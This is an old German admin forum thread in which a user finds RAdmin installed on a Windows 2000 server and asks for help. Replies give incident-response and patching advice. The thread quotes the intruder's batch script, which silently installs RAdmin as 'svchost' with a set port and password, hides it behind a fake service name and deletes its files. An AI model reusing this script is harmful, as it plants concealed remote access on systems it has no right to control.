Dieser Beitrag ist schon älter. Bitte vergewissern Sie sich, dass die Rahmenbedingungen oder der enthaltene Lösungsvorschlag noch dem aktuellen Stand der Technik entspricht.

Angriff auf W2k Server - RAdmin

Mitglied: 3080
Als ich unseren Win2000 Server wegen der neusten Windows-Updates rebootet habe war auf einmal folgendes Symbol/Programm aktiv bzw. in der Taskleiste zu sehen:

<img src='/images/articles/1632a072e2b31656b01d16faa7dbf233-radmin.jpg' align='default' hspace='0' vspace='0' border='0'>

Nach hin- und hersuchen und Informationen einholen hab ich dann schliesslich einige Dateien in Winnt\Installer\{irgendeinHashwert} gefunden, unter anderem auch folgende Batch-Datei:

off
rmico
svchost /install /silence
svchost /save /port:18 /pass:An30Gm34 /silence
net start R_server
svcinst -c R_server "Net Logon Detector"
del rmico.reg /a/f/q
del rmico.exe /a/f/q
del temp2.bat /a /f /q

Hier hat wohl jemand ein Fernadministrations-Tool installiert, aber könnt Ihr mir sagen was hier genau abläuft? Habe die dazugehörigen Dateien gelöscht, Einträge in der Registry unter dem Namen "RAdmin" entfernt, den Remote-Registry-Dienst gestoppt und den Server neu gestartet. Jetzt ist das Symbol zwar weg, aber mich würde trotzdem mal interessieren wie es dahinkommt und welchen Risiken der Server ausgesetzt ist damit sowas überhaupt möglich ist. Gibt es eine zuverlässige Firewall für W2k Server um sich vor soetwas zu schützen?

Content-Key: 5706

Url: https://administrator.de/contentid/5706

Ausgedruckt am: 23.09.2021 um 20:09 Uhr

Mitglied: 7217
7217 17.01.2005 um 14:51:36 Uhr
Goto Top
Herzlichen Glückwunsch:

du hast mit deiner voreiligen Aktion sämtliche Beweise vernichtet! Was du cleverer hättest machen sollen wäre eine komplette Sicherung des Systems gewesen (vorher alle Netzwerkaktivitäten sichern, damit man weiss, in welchem Status das Gerät aktuell war und ob evtl. noch Verbindungen zum Feind bestanden haben).

Anschließend hätte ich den Server vom Netz genommen und "Forensik" betrieben, was genau bedeutet, dass man mal versucht herauszufinden, welche Löcher man sich denn in die Sicherheit seines Servers geschossen hat.

Firewalls (auf dem Server) dürften dich vor sowas nur sehr marginal schützen. Sicherer ist es, den Patchstatus des Servers aktuell zu halten und auf jeden unnötigen Schnickschnack zu verzichten.

Gruß, Mupfel
Mitglied: fresch-heit
fresch-heit 18.01.2005 um 19:27:36 Uhr
Goto Top
/ironie/
hast du echt ne direkte verbindungs ins inet... ohne firewall /virenscanner sowas gibts noch ;)) und ich wunder mich warum sich viren immer noch so verbreiten... tsss
/ironie/
Mitglied: 7217
7217 18.01.2005 um 19:36:05 Uhr
Goto Top
Ich sprach von einer Firewall AUF dem Server... was ich VOR meinen Servern habe, ist ne ganz andere Geschichte.

Gruß, Mupfel
Mitglied: priez
priez 07.03.2005 um 17:20:10 Uhr
Goto Top
ich hab remoteadministrator zuhause aufm pc drauf. ist ein einfaches remote tool. soll einige lücken haben und knackbar sein.

ich hätte den Server vom Netz genommen (und wenn das nicht geht, zumindest den im server eingestellten "incoming port" gesperrt (standard 4899 oder so)). Danach hätte ich mir mal die logfiles angeschaut... oder wenn du eindeutig beim angriff benutzte dateien hast, alles im system mit dem gleichen erstelldatum (zeitraum) gesucht.

Wenn das Ding schon gelaufen ist ( >3 std), hast du praktisch keine chance mehr. Er hat damit vollzugriff und mit 1-3 scripten hat er vmware oder weiss sonst was dazuinstalliert.

Viel Spass beim neuinstallieren oO
Mitglied: priez
priez 07.03.2005 um 17:22:03 Uhr
Goto Top
nachtrag:

wenn du davor eine gute FW hast brauchst du auf dem server kaum noch eine. Du solltest lieber den patchstatus aktuell halten (wie schon gesagt wurde) und dir deine 3rd Party Programme, welche netzwerkdienste anbieten, mal genauer anschaun...
Heiß diskutierte Beiträge
question
Unternehmensnetzwerk aufbauenbluelightVor 1 TagFrageNetzwerke12 Kommentare

Moin zusammen, erstmal vielen Dank an der Stelle, dass mir beim letzten mal so super geholfen wurde! Aktuelle Situation: -> 5 VMs bei Netcup -> ...

question
Netzwerkdosen verbindenR3nN1979Vor 1 TagFrageInternet7 Kommentare

Hallo, Ich ziehe bald um, und benötige dabei Hilfe, wie ich Netzwerkdosen miteinander verbinden kann. Habe überhaupt keine Ahnung davon, aber mir kann jemand von ...

general
Endpoint AV für FirmenumgebungKauzigVor 1 TagAllgemeinErkennung und -Abwehr18 Kommentare

Hallo, aktuell bin ich am Suchen einer Endpoint AV für meine Firmenumgebung wichtig wäre mir ein zentrales Management sowie ggf. sogar ein Patch System. Aktuell ...

question
Ein Domänenbenutzer für alle MitarbeiterMarabuntaVor 19 StundenFrageWindows Userverwaltung6 Kommentare

Hi, ist es möglich/sinnvoll bzw. wie ist es lizenztechnisch, wenn es einen Domänen-Benutzer für alle Mitarbeiter(10) gibt, diese Benutzen eine Branchensoftware in der jeder eigene ...

question
Einarbeitung VPN und entsprechende RouterFrankNVor 1 TagFrageRouter & Routing8 Kommentare

Hallo zusammen, ich bin am Einarbeiten in das Thema VPN-Router. Ich suche ein Gerät, das es ermöglicht, ca. 50 VPN-Tunnel zu verwalten für eine Zentrale ...

question
Powershell Logon Script Problematikjoe2017Vor 1 TagFrageBatch & Shell19 Kommentare

Schönen guten Morgen, ich habe eine Frage an die Spezialisten hier. Denn ich bin gerade ratlos und am verzweifeln. Ich habe in meinem Domain Controler ...

question
Bewertung von Rechnern (Gewichtung von CPU, RAM und Festspeicher)SarekHLVor 1 TagFrageBenchmarks11 Kommentare

Hallo zusammen, ich habe hier eine Aufstellung verschiedener Rechner mit - Leistungsbewertung der CPU mit CPUMark (Quelle: - Größe Arbeitsspeicher - SSD oder HDD Wie ...

question
Was ist die beste Lösung für servergespeicherte Profile für 10 Rechner?Yan2021Vor 13 StundenFrageNetzwerke9 Kommentare

Hallo liebe Admin-User, in einem anderen Thread ging es um die Sicherung von Dienst-PCs per Image. Daraus entstand dann eine Diskussion über servergespeicherte Profile. Da ...